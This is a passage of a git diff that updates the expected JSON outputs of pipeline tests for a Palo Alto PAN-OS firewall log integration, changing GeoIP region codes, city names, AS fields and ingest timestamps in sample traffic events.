@@ -10593,7 +10213,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382012700Z", + "ingested": "2021-12-14T14:50:18.748421301Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10618,26 +10238,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10733,7 +10348,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382018100Z", + "ingested": "2021-12-14T14:50:18.748421643Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", 
@@ -10858,7 +10473,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382023400Z", + "ingested": "2021-12-14T14:50:18.748421989Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10883,26 +10498,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9064, - "ip": "175.16.199.1", - "packets": 9 + "packets": 9, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10998,7 +10608,7 @@ }, "event": { "duration": 3000000000, - "ingested": "2021-12-09T13:43:22.382028700Z", + "ingested": "2021-12-14T14:50:18.748422342Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -11023,26 +10633,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9124, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11138,7 +10743,7 @@ }, "event": { "duration": 7000000000, - "ingested": "2021-12-09T13:43:22.382033900Z", + "ingested": "2021-12-14T14:50:18.748422688Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11263,7 +10868,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382039300Z", + "ingested": "2021-12-14T14:50:18.748423046Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -11388,7 +10993,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382044500Z", + "ingested": "2021-12-14T14:50:18.748423389Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11413,26 +11018,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11528,7 +11128,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382075200Z", + "ingested": "2021-12-14T14:50:18.748423747Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -11553,26 +11153,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11668,7 +11263,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382078800Z", + "ingested": "2021-12-14T14:50:18.748424095Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11693,26 +11288,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -11808,7 +11398,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382082100Z", + "ingested": "2021-12-14T14:50:18.748424445Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11833,26 +11423,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11948,7 +11533,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382086400Z", + "ingested": "2021-12-14T14:50:18.748424793Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -11973,26 +11558,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12088,7 +11668,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382091900Z", + "ingested": "2021-12-14T14:50:18.748425139Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12213,7 +11793,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.382096200Z", + "ingested": "2021-12-14T14:50:18.748425483Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -12238,26 +11818,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12353,7 +11928,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382100100Z", + "ingested": "2021-12-14T14:50:18.748425836Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12378,26 +11953,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -12493,7 +12063,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382103400Z", + "ingested": "2021-12-14T14:50:18.748426188Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12518,26 +12088,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12633,7 +12198,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382107500Z", + "ingested": "2021-12-14T14:50:18.748426535Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", 
@@ -12658,26 +12223,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12773,7 +12333,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382113200Z", + "ingested": "2021-12-14T14:50:18.748426881Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12798,26 +12358,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 906, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -12913,7 +12468,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.382118600Z", + "ingested": "2021-12-14T14:50:18.748427241Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12938,26 +12493,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13053,7 +12603,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382123900Z", + "ingested": "2021-12-14T14:50:18.748427588Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", 
@@ -13078,26 +12628,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13193,7 +12738,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382129200Z", + "ingested": "2021-12-14T14:50:18.748427944Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13218,26 +12763,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -13333,7 +12873,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382134600Z", + "ingested": "2021-12-14T14:50:18.748428286Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13458,7 +12998,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.382139900Z", + "ingested": "2021-12-14T14:50:18.748428626Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13483,26 +13023,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 78, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -13598,7 +13133,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382145100Z", + "ingested": "2021-12-14T14:50:18.748428974Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13623,26 +13158,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 78, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13738,7 +13268,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382150400Z", + "ingested": "2021-12-14T14:50:18.748429345Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", 
@@ -13763,26 +13293,21 @@
 "nat": {},
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 80,
 "bytes": 0,
- "ip": "175.16.199.1",
- "packets": 0
+ "packets": 0,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -13878,7 +13403,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:43:22.382155700Z",
+ "ingested": "2021-12-14T14:50:18.748429685Z",
 "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:42.000-04:00",
 "timezone": "America/New_York",
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json
index f827ed55787..c2d178e4928 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json
@@ -11,26 +11,21 @@
 "nat": {},
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 80,
 "bytes": 0,
- "ip": "175.16.199.1",
- "packets": 0
+ "packets": 0,
+ "ip": "175.16.199.1"
